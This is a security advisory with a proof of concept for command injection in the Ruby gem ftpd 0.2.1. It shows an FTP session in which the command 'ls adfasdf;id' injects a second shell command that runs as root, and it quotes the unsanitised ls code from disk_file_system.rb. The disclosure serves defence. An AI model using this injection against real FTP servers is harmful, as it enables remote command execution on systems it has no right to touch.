Title:Remote command execution for Ruby Gem ftpd-0.2.1
The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on 0.0.0.0.

PoC:
for this to work the file must exist in the CWD.
ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh
Connected to localhost.
220 ftpd
Name (localhost:root):
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.

* I created the filename adfasdf

ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
ftp>./ftpd-0.2.1/lib/ftpd/disk_file_system.rb

The problem code is below

204 Ls interface used by List and NameList 205
206 module Ls
207

208       def ls(ftp_path, option)
209         path = expand_ftp_path(ftp_path)
210         dirname = File.dirname(path)
211         filename = File.basename(path)
212         command = [
213           'ls',
214           option,
215           filename, <-- ;cmd inject
216           '2>&1',
217         ].compact.join(' ')
218         if File.exists?(dirname) <- file has to exist to exec ls command
219           list = Dir.chdir(dirname) do
220             `{command}` <-- exec